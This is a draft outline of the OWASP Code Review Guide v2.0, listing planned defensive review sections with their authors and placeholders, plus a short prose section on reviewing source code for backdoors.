- 4.14.1 Spring
- 4.14.2 Struts
- 4.14.3 Drupal
- 4.14.4 Ruby on Rails
- 4.14.5 Django
- 4.14.6 .NET Security / MVC
- 4.14.7 Security in ASP.NET applications
- 4.14.8 PHP Specific Issues
- 4.14.9 Classic ASP
- 4.14.10 C#
- 4.14.11 C/C++
- 4.14.12 Objective C
- 4.14.13 Java
- 4.14.14 Android
- 4.14.15 Coldfusion
- 4.14.16 CodeIgniter
- 5 Security code review for Agile development
- 6 Code Review for Backdoors
- 7 Code Review Tools
OWASP Code Review Guide v2.0:
Forward
- Author - Eoin Keary
- Previous version to be updated:[[1]]
Code Review Guide Introduction
- Author - Eoin Keary
- Previous version to be updated:[[2]]
What is source code review and Static Analysis
What is Code Review
- Author - Zyad Mghazli, Eoin Keary
- New Section
Manual Review - Pros and Cons
- Author - Zyad Mghazli, Eoin Keary,Gary David Robinson
- New Section
- Suggestion: Benchmark of different Stataic Analysis Tools Zyad Mghazli
- Put content here
Advantages of Code Review to Development Practices
- Author - Gary David Robinson
- New Section
- Put content here
Why code review
Scope and Objective of secure code review
- Author - Ashish Rao
- Put content here
We can't hack ourselves secure
- Author - Eoin Keary
- New Section
- Put content here
360 Review: Coupling source code review and Testing / Hybrid Reviews
- Author - eoin Keary
- New Section
- Put content here
Can static code analyzers do it all?
- Author - Ashish Rao
- New Section
- Put content here
Methodology
The code review approach
- Author - Johanna Curiel
- Put content here
Preparation and context
- Author - Gary David Robinson
- Previous version to be updated: [[3]]
- Put content here
Application Threat Modeling
- Author - Larry Conklin
- Previous version to be updated: [[4]]
- Put content here
Understanding Code layout/Design/Architecture
- Author - Open
- Put content here
Understanding Business Logic
SDLC Integration
- Author - Larry Conklin
- Previous version to be updated: [[5]]
- Put content here
Deployment Models
Secure deployment configurations
- Author -
- Put content here
- New Section
Metrics and code review
- Author [email protected]
- Previous version to be updated: [[6]]
- Put content here
Source and sink reviews
- Author - Open
- New Section
- Put content here
Code review Coverage
- Author - Open
- Previous version to be updated: [[7]]
- Put content here
Design Reviews
- Author - Ashish Rao
- Why to review design?
- Building security in design - secure by design principle
- Design Areas to be reviewed
- Common Design Flaws
A Risk based approach to code review
- Author - Gary David Robinson
- New Section
- "Doing things right or doing the right things..."
- "Not all bugs are equal
Crawling code
- Author - Open
- Previous version to be updated: [[8]]
- API of Interest:
- Java
- .NET
- PHP
- RUBY
- Frameworks:
- Spring
- .NET MVC
- Struts
- Zend
- New Section
- Searching for code in C/C++
- Author - Gary David Robinson
Code reviews and Compliance
- Author -Open
- Previous version to be updated: [[9]]
- Put content here
Reviewing by Technical Control
Reviewing code for Authentication controls
- Author - Gary Robinson
- Put content here
Forgot password
- Author Abbas Naderi, Larry Conklin
- Put content here
CAPTCHA
- Author Larry Conklin, Joan Renchie
Out of Band considerations
- Author - Gary Robinson
- Previous version to be updated: [[10]]
- Put content here
Reviewing code Authorization weakness
- Author Eoin Keary .NET MVC added
- Put content here
Checking authz upon every request
- Author - Abbas Naderi
- Put content here
Reducing the attack surface
- Author Gary Robinson
- Previous version to be updated: [[11]]
- Put content here
SSL/TLS Implementations
- Author - Eoin Keary
- Put content here
Reviewing code for Session handling
- Author - Abbas Naderi
- Previous version to be updated: [[12]]
- Put content here
Reviewing client side code
- New Section
- Put content here
Javascript
- Author - Abbas Naderi
- Put content here
JSON
- Author - Open
- Put content here
Content Security Policy
- Author - Open
- Put content here
"Jacking"/Framing
- Author - Eoin Keary
- Put content here
HTML 5?
- Author - Open
- Put content here
Browser Defenses
- Author - Open
- Put content here
etc...
Review code for input validation
- Author - Open
- Put content here
Regex Gotchas
- Author - Open
- New Section
- Put content here
ESAPI
- Author - Open
- New Section
- Internal Link: [[13]]
- Put content here
Microsoft Web Protection Library
- Author - Michael Hidalgo
- New Section
- Internal Link: [[14]]
- Put content here
Reviewing code for contextual encoding
Overall approach to content encoding and anti XSS
HTML Attribute
- Author - Eoin Keary
- Put content here
HTML Entity
- Author - Eoin Keary
- Put content here
Javascript Parameters
- Author - Eoin Keary
- Put content here
JQuery
- Author - Open
- Put content here
Reviewing file and resource handling code
- Author - Open
- Put content here
Resource Exhaustion - error handling
- Author - Open
- Put content here
native calls
- Author Open
- Put content here
Reviewing Logging code - Detective Security
- Author - Gary Robinson
- Where to Log
- What to log
- What not to log
- How to log
- Internal link: [[15]]
- Put content here
Reviewing Error handling and Error messages
- Author - Gary David Robinson
- Previous version to be updated: [[16]]
- Put content here
Reviewing Security alerts
- Author - Gary Robinson
- Put content here
Review for active defense
- Author - Colin Watson
- Put content here
Reviewing Secure Storage
- Author - Open source
- New Section
- Put content here
Hashing & Salting - When, How and Where
Encryption
.NET
- Author Larry Conklin, Joan Renchie
- Previous version to be updated: [[17]]
- Can we talk about key storage as well i.e. key management for encryption techniques used in the application? - Ashish Rao
Reviewing by Vulnerability
Review Code for XSS
- Author Examples added by Eoin Keary
- Previous version to be updated: [[18]]
- In reviewing code for XSS - we can give more patterns on "source to sink" patterns for ASP.NET wrf to difference versions and mechanisms to display data in a page - Ashish Rao
- Put content here
Persistent - The Anti pattern
- Author
- Put content here
.NET
- Author Johanna Curiel, Eoin Keary
- Put content here
.Java
- Author Johanna Curiel
- Put content here
PHP
- Author Abbas Naderi
- Put content here
Ruby
- Author Open
- Put content here
Reflected - The Anti pattern
.NET
- Author Johanna Curiel
- Put content here
.Java
- Author Johanna Curiel
- Put content here
PHP
- Author Abbas Naderi
- Put content here
Ruby
- Author - Open
- Put content here
Stored - The Anti pattern
- Author - Johanna Curiel
- Put content here
.NET
- Author Johanna Curiel
- Put content here
.Java
- Author Johanna Curiel
- Put content here
PHP
- Author Johanna Curiel
- Put content here
Ruby
- Author - Johanna Curiel
- Put content here
DOM XSS
- Author Larry Conklin
- Put content here
JQuery mistakes
- Author
- Put content here
Reviewing code for SQL Injection
- Author Gary Robinson
- Previous version to be updated: [[19]]
- Put content here
PHP
- Author - Mennouchi Islam Azeddine
- Put content here
Java
- Author - Johanna Curiel
- Put content here
.NET
- Author - Open
- Put content here
HQL
- Author - Open
- Put content here
The Anti pattern
- Author Larry Conklin
- Content here
https://www.owasp.org/index.php/CRV2_AntiPattern
PHP
- Author -
- Put content here
Java
- Author -
- => Searching for traditional SQL,JPA,JPSQL,Criteria,...
- Put content here
.NET
- Author Open
- Put content here
Ruby
- Author - Open
- Put content here
Cold Fusion
- Author - Open
- Put content here
Reviewing code for CSRF Issues
- Author Abbas Naderi
- Previous version to be updated: [[20]]
- This page needs to be deleted. Put content here
(This task has been deleted) Transactional logic / Non idempotent functions / State Changing Functions
Reviewing code for poor logic /Business logic/Complex authorization
- Author - Open
- Put content here
Reviewing Secure Communications
.NET Config
- Author Johanna Curiel, Renchie Joan
- Put content here
Spring Config
- Author - Open
- Put content here
HTTP Headers
- Author Gary Robinson
- Put content here
Tech-Stack pitfalls
- Author Open
- Put content here
Framework specific Issues
Spring
- Author - Open
- Put content here
Struts
- Author - Open
- Put content here
Drupal
- Author Open
- Put content here
Ruby on Rails
- Author - Open
- Put content here
Django
- Author Open
- Put content here
.NET Security / MVC
- Author Johanna Curiel, Eoin Keary
- Put content here
Security in ASP.NET applications
- Author Johanna Curiel
- Put content here
Strongly Named Assemblies
- Author Johanna Curiel, Larry Conklin
- Put content here
Round Tripping
- Author - Open
- Put content here
How to prevent Round tripping
- Author - Open
- Author Johanna Curiel
- Put content here
Setting the right Configurations
- Author Johanna Curiel
- Put content here
Authentication Options
- Author Johanna Curiel
- Put content here
Code Review for Managed Code - .Net 1.0 and up
- Author Johanna Curiel
- Put content here
Using OWASP Top 10 as your guideline
- Author Johanna Curiel
- Put content here
Code review for Unsafe Code (C#)
- Author Johanna Curiel
- Put content here
PHP Specific Issues
- Author Open
- Put content here
Classic ASP
- Author Johanna Curiel
- Put content here
C#
- Author Open
- Put content here
C/C++
- Author Open
- Put content here
Objective C
- Author Open
- Put content here
Java
- Author Open
- Put content here
Android
- Author Open
- Put content here
Coldfusion
- Author Open
- Put content here
CodeIgniter
- Author Open
- Put content here
Security code review for Agile development
- Author Carlos Pantelides
- Put content here
Code Review for Backdoors
- Author Yiannis Pavlosoglou
The review of a piece of source code for backdoors has one excruciating difference to a traditional source code review: The fact that someone with 'commit' or 'write' access to the source code repository has malicious intentions spanning well beyond their current developer remit. Because of this difference, a code review for backdoors is often seen as a very specialised review and can sometimes be considered not a code review per say.
A traditional code review has the objective of determining if a vulnerability is present within the code, further to this if the vulnerability is exploitable and under what conditions. A code review for backdoors has the objective to determine if a certain portion of the codebase is carrying code that is unnecessary for the logic and implementation of the use cases it serves.
Further to this, the reviewer, looks for the trigger points of that logic. Typical examples include a branch statement going off to a part of assembly or obfuscated code. The reviewer is looking for patterns of abnormality in terms of code segments that would not be expected to be present under normal conditions.
An excellent introduction into how to look for rootkits in the Java programming language can be found here. In this paper J. Williams covers a variety of backdoor examples including file system access through a web server, as well as time based attacks involving a key aspect of malicious functionality been made available after a certain amount of time. Such examples form the foundation of what any reviewer for back doors should try to automate, regardless of the language in which the review is taking place.